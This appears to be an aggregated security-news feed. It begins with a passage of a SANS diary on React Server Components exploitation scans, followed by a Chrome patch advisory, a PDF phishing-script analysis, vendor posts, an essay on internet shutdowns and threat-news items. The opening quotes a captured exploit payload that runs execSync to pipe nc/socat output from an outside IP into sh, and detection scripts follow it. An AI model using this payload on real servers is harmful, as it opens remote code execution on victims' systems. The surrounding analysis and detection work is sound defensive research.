User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
Connection: close

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="$RSC"
Content-Type: application/json

{"0":{"0":{"0":{"constructor":{"constructor":{"constructor":"function() { const {execSync} = require('child_process'); return execSync('\n(nc 45.153.34.201 65050||socat - tcp:45.153.34.201:65050)|sh\n').toString(); }"}}}}}}
------WebKitFormBoundary7MA4YWxkTrZu0gW--

The overall idea is similar to what we have seen in the past. This version adds the "Rsc-Action" header, which I assume is supposed to target sites that expose React Server Components without Next.js. The "Next-Action" header is still present as well. The scans are also attempting different URLs:

/
/api
/app
/api/route
/_next/server


Other exploits have focused on the index page (/). I assume the pool of vulnerable systems is running dry, and attackers are diversifying their exploits a bit. Sadly, the host providing instructions for what to do next (45.153.34.201) is no longer providing these instructions.
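A detection-side sketch of the request described above, added here as an example and not taken from the diary or from SANS tooling: it parses a raw HTTP request and reports the action headers, the probed paths listed above, and the nested "constructor" chain in the JSON form part. Both sample requests are constructed (documentation-range hosts, command removed), and the function names and verdict labels are assumptions of this example.

```python
import json
import re

PROBED_PATHS = {"/", "/api", "/app", "/api/route", "/_next/server"}  # from the diary
ACTION_HEADERS = {"next-action", "rsc-action"}
CODE_MARKERS = ("child_process", "execSync", "require(")

# Constructed sample modelled on the request in the diary; not a captured request.
SAMPLE_PROBE = """\
POST /app HTTP/1.1
Host: 192.0.2.10
Content-Type: multipart/form-data; boundary=----ConstructedBoundary
Next-Action: 0
Rsc-Action: 0

------ConstructedBoundary
Content-Disposition: form-data; name="$RSC"
Content-Type: application/json

{"0":{"0":{"0":{"constructor":{"constructor":{"constructor":"function() { const {execSync} = require('child_process'); return execSync('<command removed>').toString(); }"}}}}}}
------ConstructedBoundary--
"""

# Constructed ordinary form post that also carries a Next-Action header.
SAMPLE_FORM = """\
POST /dashboard HTTP/1.1
Host: 192.0.2.20
Content-Type: multipart/form-data; boundary=----ConstructedBoundary
Next-Action: 0123456789abcdef0123456789abcdef01234567

------ConstructedBoundary
Content-Disposition: form-data; name="1_title"

Quarterly report
------ConstructedBoundary--
"""


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def multipart_parts(headers, body):
    """Yield (lower-cased part headers, part body) for each form-data part."""
    m = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not m:
        return
    for chunk in body.split("--" + m.group(1)):
        chunk = chunk.strip("\n")
        if chunk and chunk != "--":
            part_head, _, part_body = chunk.partition("\n\n")
            yield part_head.lower(), part_body


def constructor_depth(node, run=0):
    """Longest run of directly nested "constructor" keys in parsed JSON."""
    best = run
    if isinstance(node, dict):
        for key, value in node.items():
            nxt = run + 1 if key == "constructor" else 0
            best = max(best, constructor_depth(value, nxt))
    elif isinstance(node, list):
        for item in node:
            best = max(best, constructor_depth(item, 0))
    return best


def string_values(node):
    """Yield every string leaf of parsed JSON."""
    if isinstance(node, dict):
        node = list(node.values())
    if isinstance(node, list):
        for item in node:
            yield from string_values(item)
    elif isinstance(node, str):
        yield node


def inspect_request(raw):
    """Return {"verdict": ..., "findings": [...]} for one raw request."""
    method, path, headers, body = parse_request(raw)
    findings = []
    present = sorted(ACTION_HEADERS & set(headers))
    if present:
        findings.append("action-header:" + ",".join(present))
    if path in PROBED_PATHS:
        findings.append("probed-path:" + path)
    strong = False
    for part_head, part_body in multipart_parts(headers, body):
        if "application/json" not in part_head:
            continue
        try:
            doc = json.loads(part_body)
        except ValueError:
            findings.append("unparseable-json-part")
            continue
        depth = constructor_depth(doc)
        if depth >= 2:
            findings.append("constructor-chain:%d" % depth)
            strong = True
        if any(mark in s for s in string_values(doc) for mark in CODE_MARKERS):
            findings.append("code-in-json-string")
            strong = True
    # Legitimate Next.js server actions also send Next-Action, so the header
    # alone only rates a review; the body content decides the verdict.
    verdict = "probe" if strong else ("review" if present else "clean")
    return {"verdict": verdict, "findings": findings}
```

The header check alone is low-signal; the nested "constructor" keys and code-like strings inside the JSON part are what separate this probe from ordinary form posts.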

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Two Chrome flaws could be triggered by simply browsing the web: Update now

17 December 2025 at 11:02

Google issued an extra patch addressing two security vulnerabilities in Chrome, both of which can be triggered remotely by an attacker when a user visits a specially crafted, malicious web page.

Chrome is by far the world’s most popular browser, with an estimated 3.4 billion users. That makes it a massive target. When Chrome has a security flaw that can be triggered just by visiting a website, billions of users are exposed until they update.

That’s why it’s important to install these patches promptly. Staying unpatched means you could be at risk just by browsing the web. Attackers often try to exploit browser vulnerabilities quickly, before most users have a chance to update. Always let Chrome update itself, and don’t delay restarting it, as updates usually fix exactly this kind of risk.

How to update Chrome

The latest version number is 143.0.7499.146/.147 for Windows and macOS, and 143.0.7499.146 for Linux. So, if your Chrome is on version 143.0.7499.146 or later, it’s protected from these vulnerabilities.

The easiest way to update is to allow Chrome to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To update manually, click the More menu (three dots), then go to Settings > About Chrome. If an update is available, Chrome will start downloading it. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.

You can also find step-by-step instructions in our guide to how to update Chrome on every operating system.


Technical details

One of the vulnerabilities was found in the WebGPU web graphics API, which allows for graphics processing, games, and more, as well as AI and machine learning applications. This vulnerability, tracked as CVE-2025-14765, is a use-after-free vulnerability that could allow a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Use-after-free is a class of vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker may be able to use the error to manipulate the program.

Heap corruption occurs when a program inadvertently damages the allocator’s view of the heap, which can lead to unexpected alterations in memory. The heap is a region of memory used for dynamic memory allocation.

The other vulnerability, known as CVE-2025-14766, was—once again—found in the V8 engine as an out-of-bounds read and write.

V8 is the engine that Google developed for processing JavaScript, and it has seen more than its fair share of bugs.

An out-of-bounds read and write vulnerability means an attacker may be able to manipulate parts of the device’s memory that should be out of their reach. Such a flaw allows a program to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers could write code to a part of the memory where the system executes it with permissions that the program and user should not have.

In this case, the vulnerability could be exploited when the engine processes specially crafted HTML content, such as a malicious website.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Inside a purchase order PDF phishing campaign

17 December 2025 at 08:38

A PDF named “NEW Purchase Order # 52177236.pdf” turned out to be a phishing lure. So we analyzed the phishing script behind it.

A customer contacted me when Malwarebytes blocked the link inside a “purchase order” email they had received.

Malwarebytes blocked this ionoscloud.com subdomain

When I examined the attachment, it soon became clear why we blocked it.

The visible content of the PDF showed a button prompting the recipient to view the purchase order. Hovering over the button revealed a long URL that included a reference to a PDF viewer. While this might fool some people at first glance, a closer look raised red flags:

Hovering over the button to see where it goes

Since I’m rarely able to control my curiosity, I temporarily added an exclusion to Malwarebytes’ web protection so I could see where the link would take me. The destination was a website displaying a login form with the target’s email address already filled in (the address shown here was fabricated by me):

The objective was clear: phishing. But the site’s source code didn’t reveal much.

The most likely objective was to harvest business email addresses and their passwords. Attackers commonly test these credentials against enterprise services such as Microsoft Outlook, Google Workspace, VPNs, file-sharing platforms, and payroll systems. The deliberately vague prompt for a “business email” increases the likelihood that users will provide corporate credentials rather than personal ones.

There was also a small personalization touch. The “Estimado” greeting sets a professional tone and is common in business correspondence across Spanish-speaking regions.

For a full analysis read on, but the real clue is that the harvested credentials were accompanied by additional information about the victim’s browser, operating system, language, cookies, screen size, and location. This data was sent directly to the scammer’s account on Telegram, where it’s likely to be used to compromise the business network or sold on to other cybercriminals.

A quick search on VirusTotal showed that there were several PDF files linking to the exact same ionoscloud.com subdomain.

Analysis

As I pointed out earlier, the source code of the initial phishing page did not reveal a lot. These are probably auto-generated templates that can be planted on any website, allowing attackers a fast rotation.


ionoscloud.com belongs to IONOS Cloud, the cloud infrastructure division of IONOS, a major European hosting company. It offers services similar to Amazon AWS or Microsoft Azure, including hosting for websites and files. Scammers specifically choose reputable cloud platforms like IONOS Cloud because of the “halo effect” of being hosted at a well-known domain, which means security companies can’t just block the whole domain.

The criminals also get the flexibility to quickly spin up, modify, or tear down phishing sites and continue to evade detection by moving to new URLs or storage buckets.

So, we followed the trail to a JavaScript file, which turned out to be an obfuscated script—and a long one at that. But the end of it looked promising.

113,184 lines of code

Since it was still unclear at this point what it was up to, I changed the script so that I could get the source code without executing it, which avoided infection. To achieve this, I replaced the last line of the original script with code that exports the next layer to an HTML file.


The next obfuscation layer turned out to be easy. All it contained was a long string that needed to be unescaped. Because of the length, I used an online decoder to do that for me.

Simple unescape script

This showed me the code for the actual form that the target would see—and the goal of the whole phishing expedition.

The part that did the actual harvesting was hidden in another script.

The harvesting script

This was still pretty long and obfuscated but by analyzing the code and giving the functions readable names I managed to find out which information the script gathered. For example, the script uses the ipapi location service:

Deobfuscated location script

And I found out where it sent the details.

Telegram bot function

Any credentials entered on the phishing page are POSTed directly to the attacker’s Telegram bot and immediately forwarded to their chosen Telegram chat for collection. The Telegram chat ID hardcoded in the script was 5485275217.
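The unescape layer and the exfiltration strings described above can be recovered statically, without running any of the script. The following is an added example, not the analyst's own tooling: the sample script is constructed, the bot token is a placeholder, the `ipapi.co` hostname is an assumption (the article only names "ipapi"), and the function names are hypothetical.

```python
import re
from urllib.parse import quote

# Constructed inner layer: only the strings a harvesting script would carry.
# The chat ID is the one quoted in the article; the token is a placeholder.
INNER_LAYER = (
    'var api = "https://api.telegram.org/bot0000000000:CONSTRUCTED-TOKEN/sendMessage";\n'
    'var msg = {chat_id: "5485275217", text: ""};\n'
    'var geo = "https://ipapi.co/json/";  // hostname assumed for this example\n'
    'var seen = [navigator.userAgent, navigator.language, document.cookie, screen.width];\n'
)
# Constructed outer layer: one long percent-escaped string passed to unescape().
SAMPLE_SCRIPT = 'document.write(unescape("' + quote(INNER_LAYER, safe="") + '"));'

UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])([^"']+)\1\s*\)""")
FIELD_TOKENS = ("navigator.userAgent", "navigator.platform", "navigator.language",
                "document.cookie", "screen.width", "screen.height")


def js_unescape(text):
    """Decode %XX and %uXXXX sequences the way JavaScript's unescape() does."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def peel_layers(source, max_layers=5):
    """Return [source, layer1, ...] by decoding unescape("...") literals as text."""
    layers = [source]
    for _ in range(max_layers):
        m = UNESCAPE_CALL.search(layers[-1])
        if not m:
            break
        layers.append(js_unescape(m.group(2)))
    return layers


def extract_indicators(text):
    """Pull exfiltration and fingerprinting indicators out of one layer."""
    # Report the numeric bot ID and API method, never the secret part of the token.
    bots = {"bot%s/%s" % (m.group(1), m.group(2))
            for m in re.finditer(r"api\.telegram\.org/bot(\d+):[\w-]+/(\w+)", text)}
    return {
        "telegram": sorted(bots),
        "chat_ids": sorted(set(re.findall(r"""chat_id["'\s:=]+(-?\d+)""", text))),
        "geo_lookups": sorted(set(re.findall(r"""https?://[^\s"']*ipapi[^\s"']*""", text))),
        "collected": [t for t in FIELD_TOKENS if t in text],
    }


def triage(source):
    """Peel every layer and report what the innermost one reveals."""
    layers = peel_layers(source)
    report = extract_indicators(layers[-1])
    report["layers"] = len(layers)
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(key, value)
```

Running the extractor on the outer layer alone finds no Telegram endpoint or chat ID, which is why the page source "didn't reveal much" until the escaped string was decoded.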

How to stay safe

The advice here is pretty standard. (Do as our customer did, not as I did.)

  • Phishing and malware campaigns frequently use PDF files, so treat them like any other attachment: don’t open until the trusted sender confirms sending you one.
  • Never click links inside attachments without verifying with the sender, especially if you weren’t expecting the message or don’t know the sender.
  • Always check the address of any website asking for your login details. A password manager can help here, as it won’t auto-fill credentials on a fake site.
  • Use real-time anti-malware protection, preferably with a web protection component. Malwarebytes blocks the domains associated with this campaign.
  • Use an email security solution that can detect and quarantine suspicious attachments.

Pro tip: Malwarebytes Scam Guard recognized the screenshot of the PDF as a phishing attempt and provided advice on how to deal with it.



The 12 Months of Innovation: How Salt Security Helped Rewrite API & AI Security in 2025

17 December 2025 at 08:05

As holiday lights go up and inboxes fill with year-in-review emails, it’s tempting to look back on 2025 as “the year of AI.”

But for security teams, it was something more specific – the year APIs, AI agents, and MCP servers collided across the API fabric, expanding the attack surface faster than most organizations could keep up.

At Salt Security, we spent 2025 focused on one thing: defending the API action layer where AI, applications, and data intersect. And we did it with a steady drumbeat of innovation, a new “gift” for security teams almost every month.

So in the spirit of the season, here’s a look back at Salt’s 12 Months of Innovation – a year-long series of product launches, partnerships, and research milestones designed to help organizations stay ahead of fast-moving threats.

January – The Year Kicks Off with APIs at the Center

We kicked off the year by shining a harsh light on what many teams already suspected:

  • APIs now sit at the center of almost every digital initiative.
  • Zombie and unmanaged APIs still live in production.
  • Software supply chain dependencies are quietly multiplying risk.

Early 2025 research and thought leadership from Salt Labs showed just how dangerous it is to run modern AI and automation on top of APIs you don’t fully understand or control.

Takeaway: January set the tone – defending tomorrow’s API fabric with yesterday’s tools is no longer an option.

February – A Spotlight on API Reality

In February, we went from “we think we have a problem” to “here are the numbers.”

With the latest State of API Security Report and key industry recognitions such as inclusion in top security lists, Salt brought hard data to boardroom and CISO conversations.

The message was clear:

  • API traffic is exploding.
  • Attackers are targeting APIs at scale.
  • Traditional perimeter and app security are missing critical context.

Takeaway: API security is no longer a niche concern. It’s a business risk that demands strategy, budget, and board-level attention.

March – Gold Medals & Rising Shadows

March blended validation and urgency.

On one side, industry bodies recognized Salt’s leadership with awards like a Gold Globee, underscoring the maturity and impact of our platform.

On the other, new blogs and research highlighted reality on the ground:

  • Compliance and data privacy pressure are rising.
  • AI-driven attacks are accelerating, not slowing.

Takeaway: Excellence in API security isn’t just about winning awards, it’s about staying ahead of adversaries who are constantly adapting.

April – A Season of Partnerships & Paradigm Shifts

In April, collaboration took center stage.

We deepened integrations with leading platforms such as CrowdStrike and expanded support for modern ecosystems, including MCP server–driven architectures.

By weaving Salt API intelligence into tools security teams already rely on, we helped customers:

  • Gain richer, real-time context.
  • Simplify deployment and operations.
  • Extend protections into their existing workflows.

Takeaway: API and AI security are team sports. Partnerships and integrations turn siloed tools into a cohesive defense fabric.

May – The Cloud Era Gets Real

By May, the conversation had shifted from “we’re moving to the cloud” to “our entire business depends on it.”

Salt expanded coverage and governance capabilities for leading cloud environments and partners, helping customers:

  • Align API security with cyber insurance and regulatory expectations.
  • Build stronger posture governance and risk-management processes.
  • Translate technical API risk into board-ready language.

Takeaway: In 2025, API security moved squarely into the boardroom as a core pillar of enterprise risk.

June – Illuminate Everything

June was all about turning on the lights.

We launched Salt Illuminate and expanded Cloud Connect, giving customers the ability to:

  • Discover APIs across complex, hybrid, and multi-cloud environments.
  • Spot shadow, zombie, and unmanaged APIs in minutes instead of months.
  • Build a live inventory that actually stays current.

Takeaway: You can’t protect what you can’t see. Illuminate gave teams the visibility foundation they’ve been missing.

July – CISOs Sound the Alarm

In July, the stakes became very real.

High-profile AI mishaps, including incidents like the McDonald’s chatbot breach, made one thing painfully obvious: conversational AI and digital experiences are only as safe as the APIs behind them.

Salt responded with:

  • Deep-dive blogs on AI agent risk and API blind spots.
  • The launch of Salt Surface, designed to map and prioritize exposed API risk.

Takeaway: 2025 was the year CISOs started asking not just “What APIs do we have?” but “Which of these are exposed, exploitable, and business-critical?”

August – Autonomous Everything

By August, “autonomous” wasn’t just a buzzword, it was a roadmap theme.

Organizations leaned hard into:

  • Autonomous workflows
  • AI-driven decisioning
  • Automated threat detection and response

Salt’s innovation in this space emphasized a key reality: AI, autonomy, and APIs are inseparable.

We advanced protections for autonomous threat hunting and AI-driven security use cases, reinforcing that if APIs are compromised, autonomous systems are too.

Takeaway: You can’t secure autonomous operations if you’re not securing the API action layer that powers them.

September – Securing the AI Agent Revolution

September was a turning point.

Salt introduced the industry’s first solution to secure AI agent actions across APIs and MCP servers, bringing real controls to a problem that had mostly been theoretical.

This meant:

  • Protection against prompt injection and misuse.
  • Guardrails around what AI agents can access or execute.
  • Enforceable policy where it matters: at the API and action level.

Takeaway: The AI agent revolution doesn’t have to be a security nightmare — if you secure the actions, not just the model.

October – The Blind Spots Strike Back

In October, new data from Salt and customer environments revealed how deep the AI + API blind spots really go.

We broke down:

  • Misconfigurations in AI-driven workflows.
  • Risky patterns in agentic and MCP deployments.
  • Common mistakes teams make when bolting AI onto existing architectures.

Through detailed analysis and practical guidance, we helped teams turn confusion into a roadmap for modernizing their security posture.

Takeaway: Education is as important as technology. You can’t fix what you don’t fully understand.

November – Security Starts in Code

November brought a massive step forward in shifting API security left and right at the same time.

We launched:

  • GitHub Connect - to scan code repositories for shadow APIs, spec mismatches, and insecure patterns before they ship.
  • MCP Finder - to identify risky MCP configurations and AI-integrated workflows early in the development lifecycle.

Combined with runtime intelligence from the Salt platform, customers could now connect:

  • What’s being written → What’s being deployed → What’s being exploited

Takeaway: Real API security covers the full lifecycle, from design and code to production traffic and AI-agent actions.

December – Hello, Pepper

We closed the year with a new kind of experience: Ask Pepper AI.

Ask Pepper AI turns Salt’s platform into a conversational partner, letting users:

  • Ask natural-language questions about APIs, risks, and threats.
  • Accelerate investigation and incident response.
  • Bring complex insights to teams who don’t live inside dashboards.

Alongside MCP protection for AWS WAF, December marked the next stage in our vision: API security that’s not just powerful, but accessible and intuitive.

Takeaway: When security teams can simply ask questions and get meaningful, contextual answers, they move faster, and so does the business.

Looking Ahead: Building on a Year of Innovation

If 2025 was the year APIs fully merged with AI agents, automation, and MCP servers, 2026 will be the year organizations either embrace the API action layer or fall behind those that do.

At Salt Security, our focus remains the same:

  • See everything - every API, every action, every blind spot.
  • Understand the context - who’s calling what, from where, and why.
  • Stop attacks - before they turn into outages, data loss, or brand damage.

The 12 Months of Innovation were just the beginning. The threats are evolving, and so are we.

If you want to learn more about Salt and how we can help you, please contact us, schedule a demo, or visit our website. You can also get a free API Attack Surface Assessment from Salt Security's research team and learn what attackers already know.

The post The 12 Months of Innovation: How Salt Security Helped Rewrite API & AI Security in 2025 appeared first on Security Boulevard.

New Feature | Spamhaus Reputation Checker: Troubleshoot your listing

17 December 2025 at 05:44

It’s not always immediately clear why your IP has been listed or how to fix it. To help, we’ve added a new “troubleshooting” step to the IP & Domain Reputation Checker, specifically for those whose IPs have been listed on the Combined Spam Sources (CSS) Blocklist - IPs associated with low-reputation email. Learn how you can diagnose the issue using this new feature.

The post New Feature | Spamhaus Reputation Checker: Troubleshoot your listing appeared first on Security Boulevard.

Deliberate Internet Shutdowns

17 December 2025 at 07:02

For two days in September, Afghanistan had no internet. No satellite failed; no cable was cut. This was a deliberate outage, mandated by the Taliban government. It followed a more localized shutdown two weeks prior, reportedly instituted “to prevent immoral activities.” No additional explanation was given. The timing couldn’t have been worse: communities still reeling from a major earthquake lost emergency communications, flights were grounded, and banking was interrupted. Afghanistan’s blackout is part of a wider pattern. Just since the end of September, there were also major nationwide internet shutdowns in Tanzania and Cameroon, and significant regional shutdowns in Pakistan and Nigeria. In all cases but one, authorities offered no official justification or acknowledgment, leaving millions unable to access information, contact loved ones, or express themselves through moments of crisis, elections, and protests.

The frequency of deliberate internet shutdowns has skyrocketed since the first notable example in Egypt in 2011. Together with our colleagues at the digital rights organisation Access Now and the #KeepItOn coalition, we’ve tracked 296 deliberate internet shutdowns in 54 countries in 2024, and at least 244 more in 2025 so far.

This is more than an inconvenience. The internet has become an essential piece of infrastructure, affecting how we live, work, and get our information. It’s also a major enabler of human rights, and turning off the internet can worsen or conceal a spectrum of abuses. These shutdowns silence societies, and they’re getting more and more common.

Shutdowns can be local or national, partial or total. In total blackouts, like Afghanistan or Tanzania, nothing works. But shutdowns are often targeted more granularly. Cellphone internet could be blocked, but not broadband. Specific news sites, social media platforms, and messaging systems could be blocked, leaving overall network access unaffected—as when Brazil shut off X (formerly Twitter) in 2024. Sometimes bandwidth is just throttled, making everything slower and unreliable.

Sometimes, internet shutdowns are used in political or military operations. In recent years, Russia and Ukraine have shut off parts of each other’s internet, and Israel has repeatedly shut off Palestinians’ internet in Gaza. Shutdowns of this type happened 25 times in 2024, affecting people in 13 countries.

Reasons for the shutdowns are as varied as the countries that perpetrate them. General information control is just one. Shutdowns often come in response to political unrest, as governments try to prevent people from organizing and getting information; Panama had a regional shutdown this summer in response to protests. Or during elections, as opposition parties utilize the internet to mobilize supporters and communicate strategy. Belarusian president Alyaksandr Lukashenko, who has ruled since 1994, reportedly disabled the internet during elections earlier this year, following a similar move in 2020. But they can also be more banal. Access Now documented countries disabling parts of the internet during student exam periods at least 16 times in 2024, including Algeria, Iraq, Jordan, Kenya, and India.

Iran’s shutdowns in 2022 and June of this year are good examples of a highly sophisticated effort, with layers of shutdowns that end up forcing people off the global internet and onto Iran’s surveilled, censored national intranet. India, meanwhile, has been the world shutdown leader for many years, with 855 distinct incidents. Myanmar is second with 149, followed by Pakistan and then Iran. All of this information is available on Access Now’s digital dashboard, where you can see breakdowns by region, country, type, geographic extent, and time.

There was a slight decline in shutdowns during the early years of the pandemic, but they have increased sharply since then. The reasons are varied, but a lot can be attributed to the rise in protest movements related to economic hardship and corruption, and general democratic backsliding and instability. In many countries today, shutdowns are a knee-jerk response to any form of unrest or protest, no matter how small.

A country’s ability to shut down the internet depends a lot on its infrastructure. In the US, for example, shutdowns would be hard to enforce. As we saw when discussions about a potential TikTok ban ramped up two years ago, the complex and multifaceted nature of our internet makes it very difficult to achieve. However, as we’ve seen with total nationwide shutdowns around the world, the ripple effects in all aspects of life are immense. (Remember the effects of just a small outage—CrowdStrike in 2024—which crippled 8.5 million computers and cancelled 2,200 flights in the US alone?)

The more centralized the internet infrastructure, the easier it is to implement a shutdown. If a country has just one cellphone provider, or only two fiber optic cables connecting the nation to the rest of the world, shutting them down is easy.

Shutdowns are not only more common, but they’ve also become more harmful. Unlike in years past, when the internet was a nice option to have, or perhaps when internet penetration rates were significantly lower across the Global South, today the internet is an essential piece of societal infrastructure for the majority of the world’s population.

Access Now has long maintained that denying people access to the internet is a human rights violation, and has collected harrowing stories from places like Tigray in Ethiopia, Uganda, Annobon in Equatorial Guinea, and Iran. The internet is an essential tool for a spectrum of rights, including freedom of expression and assembly. Shutdowns make documenting ongoing human rights abuses and atrocities more difficult or impossible. They are also impactful on people’s daily lives, business, healthcare, education, finances, security, and safety, depending on the context. Shutdowns in conflict zones are particularly damaging, as they impact the ability of humanitarian actors to deliver aid and make it harder for people to find safe evacuation routes and civilian corridors.

Defenses on the ground are slim. Depending on the country and the type of shutdown, there can be workarounds. Everything, from VPNs to mesh networks to Starlink terminals to foreign SIM cards near borders, has been used with varying degrees of success. The tech-savvy sometimes have other options. But for most everyone in society, no internet means no internet—and all the effects of that loss.

The international community plays an important role in shaping how internet shutdowns are understood and addressed. World bodies have recognized that reliable internet access is an essential service, and could put more pressure on governments to keep the internet on in conflict-affected areas. But while international condemnation has worked in some cases (Mauritius and South Sudan are two recent examples), countries seem to be learning from each other, resulting in both more shutdowns and new countries perpetrating them.

There’s still time to reverse the trend, if that’s what we want to do. Ultimately, the question comes down to whether or not governments will enshrine both a right to access information and freedom of expression in law and in practice. Keeping the internet on is a norm, but the trajectory from a single internet shutdown in 2011 to 2,000 blackouts 15 years later demonstrates how embedded the practice has become. The implications of that shift are still unfolding, but they reach far beyond the moment the screen goes dark.

This essay was written with Zach Rosson, and originally appeared in Gizmodo.

Fix SOC Blind Spots: See Threats to Your Industry & Country in Real Time

17 December 2025 at 06:30

Modern security teams often feel like they’re driving through fog with failing headlights. Threats accelerate, alerts multiply, and SOCs struggle to understand which dangers matter right now for their business. Breaking out of reactive defense is no longer optional. It’s the difference between preventing incidents and cleaning up after them. Below is the path from reactive firefighting to a

China-Linked Ink Dragon Hacks Governments Using ShadowPad and FINALDRAFT Malware

17 December 2025 at 06:12

The threat actor known as Jewelbug has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America. Check Point Research is tracking the cluster under the name Ink Dragon. It's also referenced by the broader cybersecurity community under the names CL-STA-0049, Earth Alux, and REF7707. The

GhostPoster Malware Found in 17 Firefox Add-ons with 50,000+ Downloads

17 December 2025 at 03:14

A new campaign named GhostPoster has leveraged logo files associated with 17 Mozilla Firefox browser add-ons to embed malicious JavaScript code designed to hijack affiliate links, inject tracking code, and commit click and ad fraud. The extensions have been collectively downloaded over 50,000 times, according to Koi Security, which discovered the campaign. The add-ons are no longer available.

Security by Design: Why Multi-Factor Authentication Matters More Than Ever

17 December 2025 at 05:30

In an era marked by escalating cyber threats and evolving risk landscapes, organisations face mounting pressure to strengthen their security posture whilst maintaining seamless user experiences. At Thales, we recognise that robust security must be foundational – embedded into products and services by design, not bolted on as an afterthought. This principle underpins our commitment […]

The post Security by Design: Why Multi-Factor Authentication Matters More Than Ever appeared first on Blog.

The post Security by Design: Why Multi-Factor Authentication Matters More Than Ever appeared first on Security Boulevard.

SHARED INTEL Q&A: This is how ‘edge AI’ is forcing a rethink of trust, security and resilience

17 December 2025 at 05:15

A seismic shift in digital systems is underway — and most people are missing it.

While generative AI demos and LLM hype steal the spotlight, enterprise infrastructure is being quietly re-architected, not from …

The post SHARED INTEL Q&A: This is how ‘edge AI’ is forcing a rethink of trust, security and resilience first appeared on The Last Watchdog.

The post SHARED INTEL Q&A: This is how ‘edge AI’ is forcing a rethink of trust, security and resilience appeared first on Security Boulevard.

Securing the AI Revolution: NSFOCUS LLM Security Protection Solution

17 December 2025 at 02:38

As Artificial Intelligence technology rapidly advances, Large Language Models (LLMs) are being widely adopted across countless domains. However, with this growth comes a critical challenge: LLM security issues are becoming increasingly prominent, posing a major constraint on further development. Governments and regulatory bodies are responding with policies and regulations to ensure the safety and compliance […]

The post Securing the AI Revolution: NSFOCUS LLM Security Protection Solution appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks.

The post Securing the AI Revolution: NSFOCUS LLM Security Protection Solution appeared first on Security Boulevard.

The Rise of Precision Botnets in DDoS

17 December 2025 at 01:51

For a long time, DDoS attacks were easy to recognize. They were loud, messy, and built on raw throughput. Attackers controlled massive botnets and flooded targets until bandwidth or infrastructure collapsed. It was mostly a scale problem, not an engineering one. That era is ending. A quieter and far more refined threat has taken its […]

The post The Rise of Precision Botnets in DDoS appeared first on Security Boulevard.

State-Level Cyber Espionage Suspected in KT Telecom Breach

17 December 2025 at 03:02

A recent report by British technology research firm Rethink Technology Research has raised serious concerns over a cyberattack on KT, South Korea’s leading telecom operator, suggesting the incident may involve state-level cyber espionage rather than a simple fraud case. The report, titled “KT Cyberattack: More Serious Than You Think,” was published on December 10 and analyzes the implications of the breach in detail.

According to Rethink Technology Research, the KT cyberattack appears to have targeted femtocells, small cellular base stations used in homes and offices, not for micro-payment fraud, but potentially to collect large-scale data at a national level. The report states, “The cyberattack on South Korean telecom company KT is not a simple fraud case but closer to a state-level cyber espionage activity spanning several years when examining the details.”

The report further notes that KT’s internal logs only date back to August 2024, making it difficult to confirm what occurred at vulnerable points before that period. Analysts suggest that this lack of historical data complicates the investigation and points to possible systemic failures in femtocell management, server oversight, and encryption protocols. “It seems inevitable that KT's leadership will face accountability for management negligence,” the report adds.

Security Experts Weigh In

Security experts in South Korea have weighed in on the report’s findings. Dmitry Kurbatov, Chief Technology Officer at global communication security company SecurityGen, posted on LinkedIn that “the unauthorized micro-payment incident at KT is likely a deeper issue involving a network of thousands of femtocells.” Similarly, Kim Yong-dae, a professor in the Department of Electrical and Electronic Engineering at KAIST, described the incident as essentially a wiretapping operation rather than conventional financial fraud.

While Rethink Technology Research frames the attack as unprecedented in scope and sophistication, KT officials have pushed back against the report’s conclusions. A company spokesperson stated, “If you look at other reports by the author of this report, there is a tendency to be favorable and biased toward certain companies. It is difficult to regard this as an objective interpretation.”

The KT Cyberattack Investigation Timeline

The cyberattack on KT was first detected in early September, when irregular micro-payments were identified across the network. A joint government-private investigation has been ongoing for over three months, with authorities yet to release the final findings. Analysts attribute the delay to stretched investigative resources due to a series of large-scale cyber incidents in South Korea, including the Coupang data leak. Some have also speculated that the prolonged timeline may indicate an intentional delay on KT’s part.

For comparison, the SK Telecom hacking case was resolved within two and a half months, followed by compensation announcements for affected users. In the case of KT, an investigation team official noted during a briefing following the presidential business report on December 12, “While investigating KT, additional issues have emerged, and server forensics are taking a considerable amount of time.”

Industry observers warn that the cyberattack on KT should serve as a cautionary tale for telecom operators not only in South Korea but globally.

How DPDP Rules Are Quietly Reducing Deepfake and Synthetic Identity Risks

17 December 2025 at 02:54

Nikhil Jhanji, Principal Product Manager, Privy by IDfy

The DPDP rules have finally given enterprises a clear structure for how personal data enters and moves through their systems. What has not been discussed enough is that this same structure also reduces the space in which deepfakes and synthetic identities can slip through. For months the Act lived in broad conversation without detail. Now enterprises have to translate the rules into real action. As they do that work, a practical advantage becomes visible. The discipline required around consent, accuracy, and provenance creates an environment where false personas cannot blend in as easily. This was not the intention of the framework, but it is an important consequence.

DPDP Rules Bring Structure to Enterprise Data Intake

